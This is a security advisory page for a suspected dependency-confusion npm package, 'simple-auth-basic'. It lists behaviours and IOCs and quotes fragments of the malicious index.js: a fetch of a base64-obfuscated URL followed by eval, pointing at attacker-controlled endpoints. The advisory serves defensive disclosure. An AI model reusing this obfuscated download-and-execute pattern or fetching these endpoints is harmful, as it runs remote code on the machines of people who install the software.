VDB

GCVE-110-OSM-2026-1342

GCVE-110-OSM-2026-1342
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published April 3, 2026
Suspected dependency confusion attack. Behaviors: code execution, network activity, obfuscated code. Payload: index.js Key findings: - Download and Execute in index.js: "fetch(atob("aHR0cHM6Ly9jb2luZ2Vja28tbGlhcmQudmVyY2VsLmFwcC9hcGkvY29udGVudA==")),..." - Decoded Base64 Content in index.js - Decoded Base64 Content in index.js - IOCs Found in Deobfuscated Code in index.js - Dynamic Code Execution in index.js: "eval(rt1)" IOCs: - domains: jongleberry.com, somethingdoug.com, coingecko-liard.vercel.app - emails: me@jongleberry.com, doug@somethingdoug.com - urls: https://coingecko-liard.vercel.app/api/content, https://coingecko-liard.vercel.app/api/old - payloadFileHash: 4c9ec5c91c76021219516c364889f2f4898a9baf10687ee15c51f0167c1fe8c3 Decoded/deobfuscated IOCs: - urls: https://coingecko-liard.vercel.app/api/content, https://coingecko-liard.vercel.app/api/old - domains: coingecko-liard.vercel.app

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownsimple-auth-basicall (affected)

References

vendor

Browse GCVE Records

75,294 records in the GCVE database · Updated July 30, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›